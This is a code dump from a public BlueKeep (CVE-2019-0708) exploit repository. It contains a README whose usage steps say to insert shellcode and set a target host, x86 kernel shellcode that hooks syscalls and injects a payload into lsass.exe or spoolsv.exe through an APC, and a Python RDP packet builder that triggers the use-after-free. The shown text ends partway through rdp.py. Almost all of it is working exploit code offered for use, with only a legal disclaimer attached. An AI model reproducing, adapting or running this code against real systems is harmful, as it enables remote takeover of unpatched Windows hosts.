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<https://www.gnu.org/licenses/>.
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into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.

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BlueKeep/bluekeep-CVE-2019-0708-python/README.md Normal file
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# bluekeep
Public work for CVE-2019-0708
### **2019-11-17 Update** ###
Added Windows 7 32bit exploit POC code.
Using the address within the POC exploit code I had ~80% success rate against my test VM.
It could likely be modfied to increase.
#### **Usage** ####
Replace the buf variable with your shellcode.
Update the host variable to your target.
`python3 win7_32_poc.py`
### **Requirements** ###
* Python3
### **Legal Disclaimer** ###
This project is made for educational and ethical testing purposes only. Usage of for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
author: https://github.com/0xeb-bp/bluekeep

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BlueKeep/bluekeep-CVE-2019-0708-python/bluekeep_kshellcode_x86.asm Normal file
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;
; Windows x86 kernel shellcode from ring 0 to ring 3 by sleepya
; The shellcode is written for eternalblue exploit: eternalblue_exploit7.py
;
; Minor modifications were made by 0xeb-bp for BlueKeep.
;
; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
;
;
; Note:
; - The userland shellcode is run in a new thread of system process.
; If userland shellcode causes any exception, the system process get killed.
; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
; get call because system call is called on other processors.
; - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
; This helps running exploit against same target repeatly more reliable.
; - The userland payload MUST be appened to this shellcode.
;
; Reference:
; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
BITS 32
;ORG 0
PSGETCURRENTPROCESS_HASH EQU 0xdbf47c78
PSGETPROCESSID_HASH EQU 0x170114e1
PSGETPROCESSIMAGEFILENAME_HASH EQU 0x77645f3f
LSASS_EXE_HASH EQU 0xc1fa6a5a
SPOOLSV_EXE_HASH EQU 0x3ee083d8
ZWALLOCATEVIRTUALMEMORY_HASH EQU 0x576e99ea
PSGETTHREADTEB_HASH EQU 0xcef84c3e
KEINITIALIZEAPC_HASH EQU 0x6d195cc4
KEINSERTQUEUEAPC_HASH EQU 0xafcc4634
PSGETPROCESSPEB_HASH EQU 0xb818b848
CREATETHREAD_HASH EQU 0x835e515e
DATA_ORIGIN_SYSCALL_OFFSET EQU 0x0
DATA_MODULE_ADDR_OFFSET EQU 0x4
DATA_QUEUEING_KAPC_OFFSET EQU 0x8
DATA_EPROCESS_OFFSET EQU 0xc
DATA_KAPC_OFFSET EQU 0x10
section .text
global shellcode_start
shellcode_start:
setup_syscall_hook:
; IRQL is DISPATCH_LEVEL when got code execution
%ifdef WIN7
mov eax, [esp+0x20] ; fetch SRVNET_BUFFER address from function argument
; set nByteProcessed to free corrupted buffer after return
mov ecx, [eax+0x14]
mov [eax+0x1c], ecx
%elifdef WIN8
%endif
pushad
call _setup_syscall_hook_find_eip
_setup_syscall_hook_find_eip:
pop ebx
call set_ebp_data_address_fn
; read current syscall
mov ecx, 0x176
rdmsr
; do NOT replace saved original syscall address with hook syscall
lea edi, [ebx+syscall_hook-_setup_syscall_hook_find_eip]
cmp eax, edi
je _setup_syscall_hook_done
; if (saved_original_syscall != &KiFastCallEntry) do_first_time_initialize
cmp dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
je _hook_syscall
; save original syscall
mov dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
; first time on the target, clear the data area
; edx should be zero from rdmsr
mov dword [ebp+DATA_QUEUEING_KAPC_OFFSET], edx
_hook_syscall:
; set a new syscall on running processor
; setting MSR 0x176 affects only running processor
mov eax, edi
xor edx, edx
wrmsr
_setup_syscall_hook_done:
popad
_keep_halting: ; for BlueKeep
hlt ;
jmp _keep_halting ; for BlueKeep
%ifdef WIN7
xor eax, eax
%elifdef WIN8
xor eax, eax
%endif
ret 0x24
;========================================================================
; Find memory address in HAL heap for using as data area
; Arguments: ebx = any address in this shellcode
; Return: ebp = data address
;========================================================================
set_ebp_data_address_fn:
; On idle target without user application, syscall on hijacked processor might not be called immediately.
; Find some address to store the data, the data in this address MUST not be modified
; when exploit is rerun before syscall is called
lea ebp, [ebx + 0x1000]
shr ebp, 12
shl ebp, 12
sub ebp, 0x50 ; for KAPC struct too
ret
syscall_hook:
mov ecx, 0x23
push 0x30
pop fs
mov ds,cx
mov es,cx
mov ecx, dword [fs:0x40]
mov esp, dword [ecx+4]
push ecx ; want this stack space to store original syscall addr
pushfd
pushad
call _syscall_hook_find_eip
_syscall_hook_find_eip:
pop ebx
call set_ebp_data_address_fn
mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
add eax, 0x17 ; adjust syscall entry, so we do not need to reverse start of syscall handler
mov [esp+0x24], eax ; 0x4 (pushfd) + 0x20 (pushad) = 0x24
; use lock cmpxchg for queueing APC only one at a time
xor eax, eax
cdq
inc edx
lock cmpxchg byte [ebp+DATA_QUEUEING_KAPC_OFFSET], dl
jnz _syscall_hook_done
;======================================
; restore syscall
;======================================
; an error after restoring syscall should never occur
mov ecx, 0x176
cdq
mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
wrmsr
; allow interrupts while executing shellcode
sti
call r3_to_r0_start
cli
_syscall_hook_done:
popad
popfd
ret
r3_to_r0_start:
;======================================
; find nt kernel address
;======================================
mov eax, dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET] ; KiFastCallEntry is an address in nt kernel
shr eax, 0xc ; strip to page size
shl eax, 0xc
_find_nt_walk_page:
sub eax, 0x1000 ; walk along page size
cmp word [eax], 0x5a4d ; 'MZ' header
jne _find_nt_walk_page
; save nt address
mov [ebp+DATA_MODULE_ADDR_OFFSET], eax
;======================================
; get current EPROCESS and ETHREAD
;======================================
mov eax, PSGETCURRENTPROCESS_HASH
call win_api_direct
xchg edi, eax ; edi = EPROCESS
;======================================
; find offset of EPROCESS.ImageFilename
;======================================
mov eax, PSGETPROCESSIMAGEFILENAME_HASH
push edi
call win_api_direct
sub eax, edi
mov ecx, eax ; ecx = offset of EPROCESS.ImageFilename
;======================================
; find offset of EPROCESS.ThreadListHead
;======================================
; possible diff from ImageFilename offset is 0x1c and 0x24 (Win8+)
; if offset of ImageFilename is 0x170, current is (Win8+)
%ifdef WIN7
lea ebx, [eax+0x1c]
%elifdef WIN8
lea ebx, [eax+0x24]
%else
cmp eax, 0x170 ; eax is still an offset of EPROCESS.ImageFilename
jne _find_eprocess_threadlist_offset_win7
add eax, 0x8
_find_eprocess_threadlist_offset_win7:
lea ebx, [eax+0x1c] ; ebx = offset of EPROCESS.ThreadListHead
%endif
;======================================
; find offset of ETHREAD.ThreadListEntry
;======================================
; edi = EPROCESS
; ebx = offset of EPROCESS.ThreadListHead
lea esi, [edi+ebx] ; esi = address of EPROCESS.ThreadListHead
mov eax, dword [fs:0x124] ; get _ETHREAD pointer from KPCR
; ETHREAD.ThreadListEntry must be between ETHREAD (eax) and ETHREAD+0x400
_find_ethread_threadlist_offset_loop:
mov esi, dword [esi]
; if (esi - edi < 0x400) found
mov edx, esi
sub edx, eax
cmp edx, 0x400
ja _find_ethread_threadlist_offset_loop ; need unsigned comparison
push edx ; save offset of ETHREAD.ThreadListEntry to stack
;======================================
; find offset of EPROCESS.ActiveProcessLinks
;======================================
mov eax, PSGETPROCESSID_HASH
call get_proc_addr
mov eax, dword [eax+0xa] ; get offset from code (offset of UniqueProcessId is always > 0x7f)
lea edx, [eax+4] ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
;======================================
; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
;======================================
; edi = EPROCESS
; ecx = offset of EPROCESS.ImageFilename
; edx = offset of EPROCESS.ActiveProcessLinks
_find_target_process_loop:
lea esi, [edi+ecx]
call calc_hash
cmp eax, LSASS_EXE_HASH ; "lsass.exe"
jz found_target_process
%ifndef COMPACT
cmp eax, SPOOLSV_EXE_HASH ; "spoolsv.exe"
jz found_target_process
%endif
; next process
mov edi, [edi+edx]
sub edi, edx
jmp _find_target_process_loop
found_target_process:
; The allocation for userland payload will be in KernelApcRoutine.
; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
;======================================
; save EPROCESS for finding CreateThread address in kernel KAPC routine
;======================================
mov [ebp+DATA_EPROCESS_OFFSET], edi
;======================================
; iterate ThreadList until KeInsertQueueApc() success
;======================================
; edi = EPROCESS
; ebx = offset of EPROCESS.ThreadListHead
lea ebx, [edi+ebx] ; use ebx for iterating thread
lea esi, [ebp+DATA_KAPC_OFFSET] ; esi = KAPC address
pop edi ; edi = offset of ETHREAD.ThreadListEntry
; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
; Moreover, alertable thread need to be waiting state which is more difficult to check.
; try queueing APC then check KAPC member is more reliable.
_insert_queue_apc_loop:
; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
mov ebx, [ebx+4]
; no check list head
; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
; Teb member is next to Queue member.
mov eax, PSGETTHREADTEB_HASH
call get_proc_addr
mov eax, dword [eax+0xa] ; get offset from code (offset of Teb is always > 0x7f)
%ifdef WIN7
sub eax, edi
cmp dword [ebx+eax-12], 0 ; KTHREAD.Queue MUST not be NULL
%elifdef WIN8
sub eax, edi
cmp dword [ebx+eax-4], 0 ; KTHREAD.Queue MUST not be NULL
%else
cmp al, 0xa0 ; win8+ offset is 0xa8
ja _kthread_queue_check
sub al, 8 ; late 5.2 to 6.1, displacement is 0xc
_kthread_queue_check:
sub eax, edi
cmp dword [ebx+eax-4], 0 ; KTHREAD.Queue MUST not be NULL
%endif
je _insert_queue_apc_loop
; KeInitializeApc(PKAPC,
; PKTHREAD,
; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
; PKKERNEL_ROUTINE = kernel_apc_routine,
; PKRUNDOWN_ROUTINE = NULL,
; PKNORMAL_ROUTINE = userland_shellcode,
; KPROCESSOR_MODE = UserMode (1),
; PVOID Context);
xor eax, eax
push ebp ; context
push 1 ; UserMode
push ebp ; userland shellcode (MUST NOT be NULL)
push eax ; NULL
call _init_kapc_find_kroutine
_init_kapc_find_kroutine:
add dword [esp], kernel_kapc_routine-_init_kapc_find_kroutine ; KernelApcRoutine
push eax ; OriginalApcEnvironment
push ebx
sub [esp], edi ; ETHREAD
push esi ; KAPC
mov eax, KEINITIALIZEAPC_HASH
call win_api_direct
; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
; SystemArgument1 is second argument in usermode code
; SystemArgument2 is third argument in usermode code
xor eax, eax
push eax
push eax ; SystemArgument2
push eax ; SystemArgument1
push esi ; PKAPC
mov eax, KEINSERTQUEUEAPC_HASH
call win_api_direct
; if insertion failed, try next thread
test eax, eax
jz _insert_queue_apc_loop
mov eax, [ebp+DATA_KAPC_OFFSET+0xc] ; get KAPC.ApcListEntry
; EPROCESS pointer 4 bytes
; InProgressFlags 1 byte
; KernelApcPending 1 byte
; if success, UserApcPending MUST be 1
cmp byte [eax+0xe], 1
je _insert_queue_apc_done
; manual remove list without lock
mov [eax], eax
mov [eax+4], eax
jmp _insert_queue_apc_loop
_insert_queue_apc_done:
; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
_r3_to_r0_done:
ret
;========================================================================
; Call function in specific module
;
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
; eax = hash of target function name
;========================================================================
win_api_direct:
call get_proc_addr
jmp eax
;========================================================================
; Get function address in specific module
;
; Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
; eax = hash of target function name
; Return: eax = offset
;========================================================================
get_proc_addr:
pushad
mov ebp, [ebp+DATA_MODULE_ADDR_OFFSET] ; ebp = module address
xchg edi, eax ; edi = hash
mov eax, dword [ebp+0x3c] ; Get PE header e_lfanew
mov edx, dword [ebp+eax+0x78] ; Get export tables RVA
add edx, ebp ; edx = EAT
mov ecx, dword [edx+0x18] ; NumberOfFunctions
mov ebx, dword [edx+0x20] ; FunctionNames
add ebx, ebp
_get_proc_addr_get_next_func:
; When we reach the start of the EAT (we search backwards), we hang or crash
dec ecx ; decrement NumberOfFunctions
mov esi, dword [ebx+ecx*4] ; Get rva of next module name
add esi, ebp ; Add the modules base address
call calc_hash
cmp eax, edi ; Compare the hashes
jnz _get_proc_addr_get_next_func ; try the next function
_get_proc_addr_finish:
mov ebx, dword [edx+0x24]
add ebx, ebp ; ordinate table virtual address
mov cx, word [ebx+ecx*2] ; desired functions ordinal
mov ebx, dword [edx+0x1c] ; Get the function addresses table rva
add ebx, ebp ; Add the modules base address
mov eax, dword [ebx+ecx*4] ; Get the desired functions RVA
add eax, ebp ; Add the modules base address to get the functions actual VA
mov [esp+0x1c], eax
popad
ret
;========================================================================
; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
;
; Argument: esi = string to hash
; Clobber: esi
; Return: eax = hash
;========================================================================
calc_hash:
push edx
xor eax, eax
cdq
_calc_hash_loop:
lodsb ; Read in the next byte of the ASCII string
ror edx, 13 ; Rotate right our hash value
add edx, eax ; Add the next byte of the string
test eax, eax ; Stop when found NULL
jne _calc_hash_loop
xchg edx, eax
pop edx
ret
; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
;
; VOID KernelApcRoutine(
; IN PKAPC Apc,
; IN PKNORMAL_ROUTINE *NormalRoutine,
; IN PVOID *NormalContext,
; IN PVOID *SystemArgument1,
; IN PVOID *SystemArgument2)
kernel_kapc_routine:
; reorder stack to make everything easier
pop eax
mov [esp+0x10], eax ; move saved eip to &SystemArgument2
pop eax ; PKAPC (unused)
pop ecx ; &NormalRoutine
pop eax ; &NormalContext
pop edx ; &SystemArgument1
pushad
push edx ; &SystemArgument1 (use for set CreateThread address)
push ecx ; &NormalRoutine
mov ebp, [eax] ; *NormalContext is our data area pointer
;======================================
; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
;======================================
xor eax, eax
mov byte [fs:0x24], al ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
cdq
mov al, 0x40 ; eax = 0x40
push eax ; PAGE_EXECUTE_READWRITE = 0x40
shl eax, 6 ; eax = 0x40 << 6 = 0x1000
push eax ; MEM_COMMIT = 0x1000
push esp ; &RegionSize = 0x1000 (reuse MEM_COMMIT argument in stack)
push edx ; ZeroBits
mov [ecx], edx
push ecx ; baseAddr = 0
dec edx
push edx ; ProcessHandle = -1
mov eax, ZWALLOCATEVIRTUALMEMORY_HASH
call win_api_direct
%ifndef COMPACT
test eax, eax
jnz _kernel_kapc_routine_exit
%endif
;======================================
; copy userland payload
;======================================
pop eax
mov edi, [eax]
call _kernel_kapc_routine_find_userland
_kernel_kapc_routine_find_userland:
pop esi
add esi, userland_start-_kernel_kapc_routine_find_userland
mov ecx, 0x400 ; fix payload size to 1024 bytes
rep movsb
;======================================
; find current PEB
;======================================
mov eax, [ebp+DATA_EPROCESS_OFFSET]
push eax
mov eax, PSGETPROCESSPEB_HASH
call win_api_direct
;======================================
; find CreateThread address (in kernel32.dll)
;======================================
mov eax, [eax + 0xc] ; PEB->Ldr
mov eax, [eax + 0x14] ; InMemoryOrderModuleList
%ifdef COMPACT
mov esi, [eax] ; first one always be executable, skip it
lodsd ; skip ntdll.dll
%else
_find_kernel32_dll_loop:
mov eax, [eax] ; first one always be executable
; offset 0x1c (WORD) => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
; offset 0x24 (WORD) => must be 0x18 (name len kernel32.dll)
; offset 0x28 => is name
; offset 0x10 => is dllbase
;cmp word [eax+0x1c], 0x40
;jne _find_kernel32_dll_loop
cmp word [eax+0x24], 0x18
jne _find_kernel32_dll_loop
mov edx, [eax+0x28]
; check only "32" because name might be lowercase or uppercase
cmp dword [edx+0xc], 0x00320033 ; 3\x002\x00
jnz _find_kernel32_dll_loop
%endif
mov ebx, [eax+0x10]
mov [ebp+DATA_MODULE_ADDR_OFFSET], ebx
mov eax, CREATETHREAD_HASH
call get_proc_addr
; save CreateThread address to SystemArgument1
pop ecx
mov [ecx], eax
_kernel_kapc_routine_exit:
xor eax, eax
; clear queueing kapc flag, allow other hijacked system call to run shellcode
mov byte [ebp+DATA_QUEUEING_KAPC_OFFSET], al
; restore IRQL to APC_LEVEL
inc eax
mov byte [fs:0x24], al
popad
ret
userland_start:
userland_start_thread:
; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
pop edx ; saved eip
pop eax ; first argument (NormalContext)
pop eax ; CreateThread address passed from kernel
pop ecx ; another argument (NULL) passed from kernel
push ecx ; lpThreadId = NULL
push ecx ; dwCreationFlags = 0
push ecx ; lpParameter = NULL
call _userland_start_thread_find_payload
_userland_start_thread_find_payload:
add dword [esp], userland_payload-_userland_start_thread_find_payload ; lpStartAddr
push ecx ; dwStackSize = 0
push ecx ; lpThreadAttributes = NULL
push edx ; restore saved eip
jmp eax
userland_payload:
xor eax, eax ;To more easily add shellcode in exploit code

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BlueKeep/bluekeep-CVE-2019-0708-python/rc4.py Normal file
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"""
Copyright (C) 2012 Bo Zhu http://about.bozhu.me
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
def KSA(key):
keylength = len(key)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % keylength]) % 256
S[i], S[j] = S[j], S[i] # swap
return S
def PRGA(S):
i = 0
j = 0
while True:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i] # swap
K = S[(S[i] + S[j]) % 256]
yield K
def RC4(key):
S = KSA(key)
return PRGA(S)
def RC4Key(key):
return RC4([c for c in key])
def crypt(keystream, plaintext):
return bytes([c ^ next(keystream) for c in plaintext])

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BlueKeep/bluekeep-CVE-2019-0708-python/rdp.py Normal file
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import binascii
import string
import random
import struct
import time
from OpenSSL import *
from Crypto.PublicKey.RSA import construct
import rdp_crypto
def connect_req(name):
packet = binascii.unhexlify('0300002e29e00000000000436f6f6b69653a206d737473686173683d')
packet += name #1
packet += binascii.unhexlify('0d0a0100080000000000')
return packet
# initial mcs connect pdu this is where the exploit begins
def mcs_connect_init_pdu():
packet = (
'030001be02f0807f658201b20401010401010101ff30200202002202020002020200000202000102020000020200010202ffff020200023020020200010202000102020001020200010202000002020001020204200202000230200202ffff0202fc170202ffff0202000102020000020200010202ffff020200020482013f000500147c00018136000800100001c00044756361812801c0d800040008002003580201ca03aa09040000280a00006b0061006c00690000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca0100000000001800070001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00c00090000000000000002c00c00030000000000000003c03800040000007264706472000000000000c0726470736e640000000000c04d535f5431323000808000004d535f543132300080800000'
)
return binascii.unhexlify(packet)
def erect_domain_req():
packet = ( '0300000c02f0800400010001' )
return binascii.unhexlify(packet)
def attach_user_req():
packet = ( '0300000802f08028' )
return binascii.unhexlify(packet)
# channel join request packets
def get_chan_join_req():
packet = ( '0300000c02f08038000703' )#was 0503
start = 'eb'
channels = []
for c in range(0, 6): #4
channelid = int(start, 16) + c
channel = packet + format(channelid, 'x')
channels.append(channel)
return channels
# parce mcs connection resp (in wireshark as ServerData) packet.
# returns an rsa pubkey object and the server random data used later to
# generate session encryption keys
def parse_mcs_conn_resp(packet):
# 4.1.4 Server MCS Connect Response PDU with GCC Conference Create Response
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/d23f7725-876c-48d4-9e41-8288896a19d3
# 2.2.1.4.3.1.1.1 RSA Public Key (RSA_PUBLIC_KEY)
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/fe93545c-772a-4ade-9d02-ad1e0d81b6af
# all the next slicing makes sense when looking at above two links
# find headerType serverSecurityData (0x0c02)
header_offset = packet.find(b'\x02\x0c')
sec_data = packet[header_offset:]
ran_len = int.from_bytes(sec_data[12:12+4], byteorder='little')
server_ran = sec_data[20:20+ran_len]
# magic number
server_cert_offset = packet.find(b'\x52\x53\x41\x31')
server_cert = packet[server_cert_offset:]
key_len = int.from_bytes(server_cert[4:8], byteorder='little')
bit_len = int.from_bytes(server_cert[8:12], byteorder='little')
rsa_pub_exp = int.from_bytes(server_cert[16:20], byteorder='little')
rsa_pub_mod = int.from_bytes(server_cert[20:20+key_len], byteorder='little')
#print('pub_mod = %s' % binascii.hexlify(server_cert[20:20+key_len]))
#print('keylen: %d' % key_len)
#print('bitlen: %d' % bit_len)
#print('pub exp: %d' % rsa_pub_exp)
pubkey = construct((rsa_pub_mod, rsa_pub_exp))
crypt = []
crypt.append(server_ran)
crypt.append(pubkey)
crypt.append(bit_len)
return crypt
# the securty exchange (send our client random encrypted with servers pub RSA key)
def sec_exchange(pubkey, bit_len):
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ca73831d-3661-4700-9357-8f247640c02e
# 5.3.4.1 Encrypting Client Random
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/761e2583-6406-4a71-bfec-cca52294c099
tpkt = binascii.unhexlify('0300') # still require two bytes for size
mcs_pdu = binascii.unhexlify('02f08064000503eb70')
enc_client_ran = pubkey.encrypt(b'A'*32, None)[0]
# reverse for little endian
enc_client_ran = enc_client_ran[::-1]
enc_client_ran = enc_client_ran.ljust(int((bit_len/8)+8), b'\x00')
sec_exchange_len = struct.pack('<I', len(enc_client_ran))
sec_flags = binascii.unhexlify('01000000') #48000000')
sec_exchange_pdu = sec_flags + sec_exchange_len + enc_client_ran
mcs_pdu_size = struct.pack('>H', len(sec_exchange_pdu)+0x8000)
mcs_pdu += mcs_pdu_size
to_send = mcs_pdu + sec_exchange_pdu
#add 4 for tpkt hdr/size
total_size = len(to_send) + 4
tpkt += struct.pack('>H', total_size) + to_send
return tpkt
# client info
def client_info(crypter, name):
packet_hdr = binascii.unhexlify('0300015902f08064000503eb70814a48000000')
packet = binascii.unhexlify('00000000330100000000100000000000000000')
# 2 byte unicode for the name
name = b''.join([b'0'+bytes([b]) for b in name])
packet += name
packet += binascii.unhexlify('00000000000000000002001a003100390032002e003100360038002e0030002e003300340000003c0043003a005c00570049004e004e0054005c00530079007300740065006d00330032005c006d007300740073006300610078002e0064006c006c0000002c0100004700540042002c0020006e006f0072006d0061006c0074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000a00000005000300000000000000000000004700540042002c00200073006f006d006d006100720074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000300000005000200000000000000c4ffffff00000000270000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + packet_sig + packet_enc
# send client confirm active pdu
def client_confirm(crypter):
packet_hdr = binascii.unhexlify('030001bf02f08064000503eb7081b0')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('a4011300ee03ea030100ea0306008e014d53545343000e00000001001800010003000002000000000c04000000000000000002001c00ffff01000100010020035802000001000100000001000000030058000000000000000000000000000000000000000000010014000000010047012a000101010100000000010101010001010000000000010101000001010100000000a1060000000000000084030000000000e40400001300280000000003780000007800000050010000000000000000000000000000000000000000000008000a000100140014000a0008000600000007000c00000000000000000005000c00000000000200020009000800000000000f000800010000000d005800010000000904000004000000000000000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c000800010000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000fe008000fe000001400000080001000102000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client sync
def client_sync(crypter):
packet_hdr = binascii.unhexlify('0300003102f08064000503eb708022')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('16001700ee03ea030100000108001f0000000100ea03')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client cooperate
def client_cooperate(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00140000000400000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client control request
def client_control_req(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00140000000100000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client persistent key length
def client_persistent_key_len(crypter):
packet_hdr = binascii.unhexlify('0300003d02f08064000503eb70802e')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('22001700ee03ea030100000114001c00000001000000000000000000000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client font list
def client_font_list(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00270000000000000003003200')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
def send_dc():
return binascii.unhexlify('0300000b06800000000000')
# params
# initiator is two byte channel initiator
# channelid is two byte channel id
# virt_chan_data is data to send
def write_virtual_channel(crypter, initiator, channelId, virt_chan_data):
tpkt = binascii.unhexlify('0300') # still require two bytes for size
x224 = binascii.unhexlify('02f080')
mcs_pdu = binascii.unhexlify('64')
mcs_pdu += struct.pack('>H', initiator)
mcs_pdu += struct.pack('>H', channelId)
mcs_pdu += binascii.unhexlify('70') # flags had 80
sec_hdr = binascii.unhexlify('08000000')
# channel_pdu_flags = binascii.unhexlify('03000000') # original
channel_pdu_flags = binascii.unhexlify('42424242')
# the len is not correct
channel_pdu_hdr = struct.pack('<I', len(virt_chan_data)) + channel_pdu_flags
virt_chan_pdu = channel_pdu_hdr + virt_chan_data
packet_sig = crypter.sign(virt_chan_pdu)
virt_chan_pdu_enc = crypter.encrypt(virt_chan_pdu)
send_data = sec_hdr + packet_sig + virt_chan_pdu_enc
mcs_pdu_size = struct.pack('>H', len(send_data)+0x8000)
#print('mcs_pdu_size')
#print(binascii.hexlify(mcs_pdu_size))
mcs_pdu += mcs_pdu_size
to_send = x224 + mcs_pdu + send_data
#add 4 for tpkt hdr/size
total_size = len(to_send) + 4
tpkt += struct.pack('>H', total_size) + to_send
#print('len of tpkt')
#print(binascii.hexlify(struct.pack('>H', total_size)))
#print(binascii.hexlify(tpkt))
return tpkt
def test_if_vuln_32(crypter):
to_send = binascii.unhexlify('00000000020000000000000000000000')
return write_virtual_channel(crypter, 7, 1007, to_send)
def test_if_vuln_64(crypter):
to_send = binascii.unhexlify('0000000000000000020000000000000000000000000000000000000000000000')
return write_virtual_channel(crypter, 7, 1007, to_send)
def free_32(crypter):
# packet_hdr = binascii.unhexlify('0300003502f08064000703ef708026')
# sec_hdr = binascii.unhexlify('08000000')
# packet = binascii.unhexlify('1200000003000000000000000200000000000000000000005A5A')
# packet_sig = crypter.sign(packet)
# packet_enc = crypter.encrypt(packet)
# return packet_hdr + sec_hdr + packet_sig + packet_enc
to_send = binascii.unhexlify('000000000200000000000000000000005A5A')
return write_virtual_channel(crypter, 7, 1007, to_send)
def free_64(crypter):
to_send = binascii.unhexlify('00000000000000000200000000000000000000000000000000000000000000005A5A')
return write_virtual_channel(crypter, 7, 1007, to_send)
def get_ran_name():
name = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
return name.encode('utf-8')
# commence janky parsing
# might be useful
def get_tpkt_size(tpkt):
return int.from_bytes(tpkt[2:4], byteorder='big')
def read_rdp_data(s, crypter):
resp = b''
while True:
resp = resp + s.recv(8192)
len_msg = len(resp)
tpkt_offset = resp.find(b'\x03\x00')
